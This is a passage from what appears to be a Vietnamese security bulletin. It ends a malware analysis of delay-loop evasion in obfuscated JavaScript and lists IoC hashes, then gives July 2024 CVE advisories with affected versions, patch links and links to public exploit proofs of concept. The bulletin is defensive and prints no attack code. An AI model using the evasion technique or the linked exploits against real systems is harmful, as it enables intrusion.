Cấu hình cài đặt Node.js để debug các đoạn mã code js trong Visual Studio Code, nhận thấy mã độc được viết đan xen với các thư viện JavaScript hợp lệ, quá trình debug cũng cho thấy việc mã độc sẽ thực thi sau khi vượt qua nhiều vòng lặp với thời gian được chỉ định, nhằm lẩn tránh sự phát hiện.

Trong hình ảnh trên, xảy ra tình trạng xuất hiện vòng lặp vô hạn do jobcv được gán giá trị bằng 1, oftenfs hoạt động như một counter với giá trị khởi tạo ban đầu là 8242. Vòng lặp sẽ tiếp tục chạy cho đến khi oftenfs có giá trị 2597242, horseq7 sẽ tiếp tục tham chiếu đến hàm có tên sleepy. Theo như môi trường đã thử nghiệm, mất khoảng 10 phút để oftenfs đạt tới giá trị là 2597242

Tiếp tục phân tích là sleepy, tại đây horseq7 được gán một hàm có tên là indicate6, gần giống hàm trước đó, code sẽ được được delays, bên trong hàm indicate6, horseq7 sẽ tiếp tục được gán tới hàm lclft4 như hình ảnh dưới đây:

Sau các quá trình delays, mã độc sẽ nhảy tới hàm course83, nơi thực hiện các chức năng chính của mã độc

Counter Value Function Name
2597242 sleepy
5210044 indicate6
6001779 lclft4

Indicator of Compromises (IoCs)

442f5adc6277ad17dfbc83bdee1f0d32364c6edb

947539769b8a818530e9790c27084b2850333c29

3        CVE và các khuyến nghị bảo mật

3.1      Microsoft Patch Tuesday – July 2024

Trong tháng 07, Microsoft đã phát hành các bản vá cho 139 CVE mới trong các sản phẩm của Windows và Windows Components; Office và Office Components; .NET và Visual Studio; Azure; Defender for IoT; SQL Server; Windows Hyper-V; Bitlocker và Secure Boot; Remote Desktop; và Xbox. Trong đó có 5 lỗ hổng được đánh giá mức độ Nghiêm trọng, 133 lỗ hổng được đánh giá là Important, 3 lỗ hổng được đánh giá Moderate. Dưới đây là các CVE nổi bật:

3.1.1       CVE-2024-38080– Cảnh báo lỗ hổng leo thang đặc quyền trong Windows Hyper-V Elevation | Windows Hyper-V Elevation of Privilege Vulnerability

CVSS: 7.8/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa với đặc quyền SYSTEM trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu xác thực.

Phiên bn nh hưởng:

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows 11 Version 23H2 for x64based Systems

Windows 11 Version 23H2 for ARM64based Systems

Windows 11 Version 22H2 for x64based Systems

Windows 11 Version 22H2 for ARM64based Systems

Windows 11 version 21H2 for ARM64based Systems

Windows 11 version 21H2 for x64based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38080

3.1.2       CVE-2024-38112 – Cảnh báo lỗ hổng Spoofing trên Windows MSHTML Platform | Windows MSHTML Platform Spoofing Vulnerability.

CVSS: 7.5/10

Mô t: Tồn tại lỗ hổng Spoofing trong Windows MSHTML Platform. Khai thác lỗ hổng thành công yêu cầu kẻ tấn công cần chuẩn bị môi trường mục tiêu và có sự tương tác từ người dùng.

Phiên bn nh hưởng:

Windows 10 Version 1809 for 32bit Systems

Windows Server 2019

Windows 11 Version 22H2 for x64based Systems

Windows 10 Version 21H2 for x64based Systems

Windows Server 2022

Windows 11 version 21H2 for x64based Systems

Windows 11 version 21H2 for ARM64based Systems

Windows Server 2019 (Server Core installation)

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows 10 Version 21H2 for ARM64based Systems

Windows Server 2012 R2 (Server Core installation)

Windows 10 Version 22H2 for 32bit Systems

Windows 11 Version 23H2 for ARM64based Systems

Windows Server 2012 R2

Windows 10 Version 22H2 for ARM64based Systems

Windows 10 Version 1809 for x64based Systems

Windows Server 2008 for x64based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64based Systems Service Pack 2

Windows Server 2008 for 32bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32bit Systems Service Pack 2

Windows 10 Version 1809 for ARM64based Systems

Windows Server 2016 (Server Core installation)

Windows 10 Version 21H2 for 32bit Systems

Windows Server 2016

Windows 10 Version 1607 for x64based Systems

Windows 10 Version 1607 for 32bit Systems

Windows 10 for x64based Systems

Windows 11 Version 22H2 for ARM64based Systems

Windows 10 for 32bit Systems

Windows 11 Version 23H2 for x64based Systems

Windows 10 Version 22H2 for x64based Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112

3.1.3       CVE-2024-38077 – Cảnh báo lỗ hổng thực thi mã từ xa trong Windows Remote Desktop Licensing Service | Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability.

CVSS: 9.8/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công không cần xác thực thực thi mã từ xa. Khai thác lỗ hổng yêu cầu kết nối với Remote Desktop Licensing Service và gửi các message độc hại.

Phiên bn nh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077

3.1.4       CVE-2024-38060 – Cảnh báo lỗ hổng thực thi mã từ xa trên Microsoft Windows Codecs Library | Microsoft Windows Codecs Library Remote Code Execution Vulnerability.

CVSS: 8.8/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên Microsoft Windows Codecs Library. Khai thác lỗ hổng yêu cầu xác thực sau đó upload TIFF file độc hại lên máy chủ. Khai thác lỗ hổng không yêu cầu quyền admin hay các đặc quyền nâng cao khác.

Phiên bn nh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows 11 Version 23H2 for x64-based Systems

Windows 11 Version 23H2 for ARM64-based Systems

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38060

3.1.5       CVE-2024-38023/CVE-2024-38024 – Cảnh báo lỗ hổng thực thi mã từ xa trên Microsoft SharePoint Server | Microsoft SharePoint Server Remote Code Execution Vulnerability

CVSS: 7.2/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên SharePoint Server. Khai thác lỗ hổng yêu cầu xác thực, kẻ tấn công cần có quyền trong Site Owner từ đó tải các tệp độc hại lên Sharepoint Server và gửi các API request để trigger quá trình deserialization trong file’s parameters.

Phiên bn nh hưởng:

Microsoft SharePoint Server Subscription Edition

Microsoft SharePoint Server 2019

Microsoft SharePoint Enterprise Server 2016

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38023

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38024

3.1.6       CVE-2024-38094– Cảnh báo lỗ hổng thực thi mã từ xa trên Microsoft SharePoint | Microsoft SharePoint Remote Code Execution Vulnerability

CVSS: 7.2/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên SharePoint Server. Khai thác lỗ hổng yêu cầu xác thực, kẻ tấn công cần có quyền trong Site Owner.

Phiên bn nh hưởng:

Microsoft SharePoint Server Subscription Edition

Microsoft SharePoint Server 2019

Microsoft SharePoint Enterprise Server 2016

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38094

3.2      Ứng Dụng Web Và Các Sản Phẩm Khác

3.2.1       CVE-2024-36991 – Splunk Unauthenticated Path Traversal Modules Messaging

CVSS: 7.5/10

Mô t: Tồn tại lỗ hổng path traversal ở “/modules/messaging/” endpoint trên Splunk Enterprise Windows các phiên bản dưới 9.2.2, 9.1.5, và 9.0.10 cho phép kẻ tấn công đọc các thông tin nhạy cảm trên hệ thống bị ảnh hưởng.

Phiên bn nh hưởng:

Phiên bản dưới 9.2.2, 9.1.5 và 9.0.10

Lưu ý: Lỗ hổng này chỉ ảnh hưởng đến Splunk Enterprise trên Windows

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:.

https://advisory.splunk.com/advisories/SVD-2024-0711

https://docs.splunk.com/Documentation/Splunk/latest/Security/DisableunnecessarySplunkcomponents

3.2.2       CVE-2024-29943 – Out-of-bounds Read or Write Vulnerability.

CVSS: 9.8/10

Mô t: Tồn tại lỗ hổng out-of-bounds trong Firefox cho phép kẻ tấn công đọc/ghi trên các đối tượng JavaScript, khai thác thành công cho phép thực thi mã từ xa và sandbox escape ảnh hưởng đến Firefox thấp hơn phiên bản 124.0.1.

Lỗ hổng được trình bày trong cuộc thi hacking Pwn2Own Vancouver 2024. Hiện tại, bài phân tích lỗ hổng và mã khai thác đã public trên Internet, chi tiết xem tại:
https://github.com/bjrjk/CVE-2024-29943

Phiên bn nh hưởng:

Phiên bản Firefox < 124.0.1

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://www.mozilla.org/en-US/security/advisories/mfsa2024-15/

3.2.3       CVE-2024-6387- OpenSSH Server Remote Unauthenticated Code Execution vulnerability.

CVSS: 8.1/10

Mô t: Tồn tại lỗ hổng race-condition trong sshd cho phép kẻ tấn công thực thi đoạn mã tùy ý với quyền root. Theo ghi nhận từ mô tả của hãng, lỗ hổng đã được khai thác thành công trên môi trường lab sử dụng hệ điều hành 32-bit Linux/glibc với cơ chế ASLR được bật, khai thác yêu cầu từ 6h đến 8h để thực hiện. Môi trường 64bit được cho là có thể khai thác nhưng chưa được chứng minh, các môi trường khác không phải glibc cũng chưa được kiểm chứng, hệ thống không có cơ chế ASLR được cho là khiến lỗ hổng dễ khai thác hơn và OpenBSD được cho là khó bị khai thác.

Hiện tại, bài phân tích về lỗ hổng và mã khai thác mới được public trên Internet, tuy nhiên chưa thể kiểm chứng và đảm bảo việc hoạt động của mã khai thác.

Thông tin mã khai thác: https://github.com/acrono/cve-2024-6387-poc

Phiên bn nh hưởng:

–  OpenSSH < 4.4p1 nếu chưa được cập nhật bản vá CVE-2008-4109 và CVE-2006-5051 sẽ bị ảnh hưởng bởi lỗ hổng.

–  OpenSSH phiên bản 8.5p1 đến 9.8p1 (8.5p1 <= OpenSSH < 9.8p1) bị ảnh hưởng bởi lỗ hổng.

– OpenSSH phiên bản từ 4.4p1 đến 8.5p1 không bị ảnh hưởng.

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://www.openssh.com/txt/release-9.8

https://www.openssh.com/security.html

https://www.openssh.com/releasenotes.html

https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt

3.2.4       CVE-2024-6235- Cảnh báo lỗ hổng lộ lọt thông tin | Sensitive information disclosure vulnerability

CVSS: 9.4/10

Mô t: Tồn tại lỗ hổng tiết lộ thông tin ảnh hưởng đến các sản phẩm NetScaler Console do không xử lý đúng cách trong quá trình xác thực cho phép kẻ tấn công có quyền truy cập vào NetScaler Console, đọc hoặc truy cập vào các dữ liệu nhạy cảm.

Phiên bn nh hưởng:

NetScaler Console 14.1 trước phiên bản 14.1-25.53

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://support.citrix.com/article/CTX677998/netscaler-console-agent-and-sdx-svm-security-bulletin-for-cve20246235-and-cve20246236

3.2.5       CVE-2024-6236- Cảnh báo lỗ hổng từ chối dịch vụ | Denial of Service Vulnerability

CVSS: 7.1/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công từ chối dịch vụ trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu kẻ tấn công có quyền truy cập vào địa chỉ IP của NetScaler Console, NetScaler Agent, NetScaler SDX (SVM).

Phiên bn nh hưởng:

NetScaler Console 14.1 phiên bản trước 14.1-25.53

NetScaler Console 13.1 phiên bản trước 13.1-53.22

NetScaler Console 13.0 phiên bản trước 13.0-92.31

NetScaler SDX (SVM) 14.1 phiên bản trước 14.1-25.53

NetScaler SDX (SVM) 13.1 phiên bản trước 13.1-53.17

NetScaler SDX (SVM) 13.0 phiên bản trước 13.0-92.31

NetScaler Agent 14.1 phiên bản trước 14.1-25.53

NetScaler Agent 13.1 phiên bản trước 13.1-53.22

NetScaler Agent 13.0 phiên bản trước 13.0-92.31

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://support.citrix.com/article/CTX677998/netscaler-console-agent-and-sdx-svm-security-bulletin-for-cve20246235-and-cve20246236

3.2.6       CVE-2024-22274 – Cảnh báo lỗ hổng thực thi mã từ xa trên VMware vCenter Server | VMware vCenter Server authenticated remote-code execution vulnerability

CVSS: 7.2/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên VMware vCenter Server. Khai thác lỗ hổng yêu cầu xác thực.

Phiên bn nh hưởng:

Cloud Foundation (vCenter Server) phiên bản 4.x và 5.x

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24308

3.2.7       CVE-2024-40725- Source Code Disclosure via Handlers Configured with AddType

CVSS: 7.5 /10

Mô t: Bản vá cập nhật Apache HTTP Server 2.4.61 được hãng phát hành nhằm vá lỗ hổng CVE-2024-39884 – lỗ hổng cho phép tiết lộ các thông tin nhạy cảm như source code. Tuy nhiên, việc cập nhật ở bản vá này chưa được triệt để, kẻ tấn công vẫn có thể khai thác lại một số cấu hình cũ cho phép tiết lộ mã nguồn (source code disclosure).

Phiên bn nh hưởng:

Apache HTTP Server phiên bản 2.4.60 đến 2.4.61

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://httpd.apache.org/security/vulnerabilities_24.html

3.2.8       CVE-2024-40898 – SSRF with mod_rewrite on Windows

CVSS: 7.5 /10

Mô t: Tồn tại lỗ hổng SSRF trong Apache HTTP Server cho phép kẻ tấn công có thể trích xuất và thu thập NTML hashes thông qua các request độc hại.

Phiên bn nh hưởng:

Apache HTTP Server phiên bản 2.4.0 đến 2.4.61

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://httpd.apache.org/security/vulnerabilities_24.html